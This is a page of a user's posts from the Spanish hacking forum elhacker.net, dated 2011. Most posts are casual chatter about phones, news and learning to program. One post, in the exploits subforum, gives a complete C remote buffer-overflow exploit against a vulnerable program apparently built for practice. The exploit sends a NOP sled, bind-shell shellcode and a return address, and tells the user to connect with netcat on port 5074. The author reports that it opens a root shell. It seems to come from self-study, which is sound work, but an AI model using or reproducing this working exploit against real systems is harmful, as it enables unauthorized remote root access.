elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 125
101  Foros Generales / Dudas Generales / Re: ipad nuevo éxito en ventas? cuando creéis que suben las ventas o bajan? en: 5 Marzo 2011, 22:20 pm
Para uso personal nada mejor que un Nokia bien grandote o (mi favorito) un Sony Ericsson X8... Móviles pero igualmente útiles: Mientras sean Androids...

Un saludo!
102  Foros Generales / Foro Libre / Re: Invita China al hijo del lider norcoreano en: 5 Marzo 2011, 22:11 pm
Creía que China iba a colaborar para la paz entre las dos Coreas... Chinos !!!
103  Foros Generales / Foro Libre / Re: Hola, recomiendo esta web para ver la TV. en: 5 Marzo 2011, 22:09 pm
Está fenomenal, pero no es en directo :P jeje
Una cosa... algunos canales como GolTV no funcionan...

El proyecto es buenísimo, muchas gracias!
104  Seguridad Informática / Bugs y Exploits / Re: ¿Qué pasa con mi buffer? en: 5 Marzo 2011, 19:49 pm
Tanan!!! Fin!!!
La cosa era que la shellcode se copiaba dos veces porque, como bien dice Iván (no lo interpreté bien...), la shellcode se copia dos veces porque memset no le pone un \x00 al final...
Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <arpa/inet.h>
  5. #include <sys/socket.h>
  6.  
  7. int main (int argc, char *argv [])
  8. {
  9. printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n");
  10. if (argc != 3)
  11. {
  12. printf ("!!! Use: %s <target_ip> <port>\n\n", argv [0]);
  13. return 1;
  14. }
  15.  
  16. printf ("Creating socket...\t");
  17. struct sockaddr_in host; int sockfd;
  18. host.sin_family = AF_INET;
  19. host.sin_port = htons (atoi (argv [2]));
  20. host.sin_addr.s_addr = inet_addr (argv [1]);
  21. memset (host.sin_zero, 0, 8);
  22. if ((sockfd=socket (2, 1, 0))==-1)
  23. {
  24. printf ("[FAIL]\n\n");
  25. return 1;
  26. }
  27. else printf ("[OK]\n");
  28.  
  29. printf ("Conecting target...\t");
  30. if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1)
  31. {
  32. printf ("[FAIL]\n\n");
  33. return 1;
  34. }
  35. else printf ("[OK]\n");
  36.  
  37. printf ("Creating buffer...\t");
  38. char nops [169];
  39. memset (nops, '\x90', 168);
  40. nops [168] = '\x00';
  41. char shellcode [93] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10"
  42. "\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80"
  43. "\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
  44. "\xe1\xb0\x0b\xcd\x80";
  45. char ret [6] = "\x50\xf8\xff\xbf\x90";
  46. char command [265];
  47. strcpy (command, nops);
  48. strcat (command, shellcode);
  49. strcat (command, ret);
  50. printf ("[OK]\n");
  51.  
  52. printf ("Sending buffer...\t");
  53. if (send (sockfd, &command, strlen (command), 0)==-1)
  54. {
  55. printf ("[FAIL]\n\n");
  56. return 1;
  57. }
  58. else printf ("[OK]\n\n");
  59.  
  60. printf ("Now you can exec NC [nc -vv %s 5074]\nBe good!\n\n", argv [1]);
  61. return 0;
  62. }
  63.  

Un saludo!!!

____________________
Modf: Lo acabo de probar en otro sistema, y sólo con desactivar el randomize_va_space y cambiar el RET, todo va perfectamente y me abre una shell con privilegios root en el puerto 5074. Conseguido! Ahora voy a ver por qué no funciona fuera del GDB...
105  Seguridad Informática / Seguridad / Re: programa espia en: 5 Marzo 2011, 19:16 pm
Si sabes Batch ahora deberías leerte algún libro sobre C. Es un lenguaje sencillo que todos pueden aprender ;).
Recuerda que donde mejor aprenderás será en los libros. Te lo digo de experiencia :silbar:.

Un saludo!
106  Seguridad Informática / Seguridad / Re: programa espia en: 5 Marzo 2011, 18:35 pm
Por favor, olvídate ya de troyanos y demás. No aprenderás nada con ellos...

Un consejito sería pasarte por la Wiki de elhacker.net. Tiene muchas cosas interesantes, a pesar de estar algo abandonada... Luego podrías leer las chinchetitas de post interesantes, hay algunas cosas muy buenas también. Luego intenta aprender a programar algún lenguaje de scripting sencillito, tipo Batch o demás (Perl es muy bueno también). No te canses de buscar!

Sagrini
107  Foros Generales / Noticias / Re: Google puede ser una bomba en: 5 Marzo 2011, 18:31 pm
Esto sí que ha sido interesante!

Hay que ver algunas cosas...
La semana pasada, un grupo de antiabortistas manipuló los resultados de búsqueda de Google para que, cuando se realizase una consulta sobre el término ‘murderSSRq (‘asesinato', en inglés) mostrase la entrada a la Wikipedia de la palabra ‘aborto' en segunda posición. El blog Jezebel, uno de los primeros en alertar sobre el suceso, denunciaba que Google tendría que detener este tipo de prácticas. "Es una táctica antisocial, que hace que los resultado útiles se alejen de las primeras posiciones y prevalezca la información inútil", aseguraba. "Obviamente, esa página de la Wikipedia no es el segundo documento más relevante respecto al asesinato en toda la web de habla inglesa", apuntaban en la web Boing Boing. Pocos días después, esta campaña fue desactivada.
Entonces el aborto no es un asesinato? Qué cabezones!

Pues Wikipedia nos quita el primer puesto al escribir "hacker" en Google debido a que tiene cientos de enlaces a otras páginas. Entonces Wikipedia es lo más importante de la Web? Porque siempre sale la primera :P :D
108  Programación / ASM / Re: Problema al imprimir valores numericos en: 5 Marzo 2011, 18:24 pm
Creo que deberías usar Xl en vez de Xh. Por otra parte no entiendo tu problema...
109  Foros Generales / Dudas Generales / Re: ipad nuevo éxito en ventas? cuando creéis que suben las ventas o bajan? en: 5 Marzo 2011, 18:09 pm
La verdad es que son carísimos de todos modos, pero yo creo que en un mes o dos saldrán cientos de ofertas...
110  Foros Generales / Noticias / Re: Los virus también se disfrazan para carnaval en: 5 Marzo 2011, 18:07 pm
Eso pasa por usar Facebook  :-X Pues vaya virus :P
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 125
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines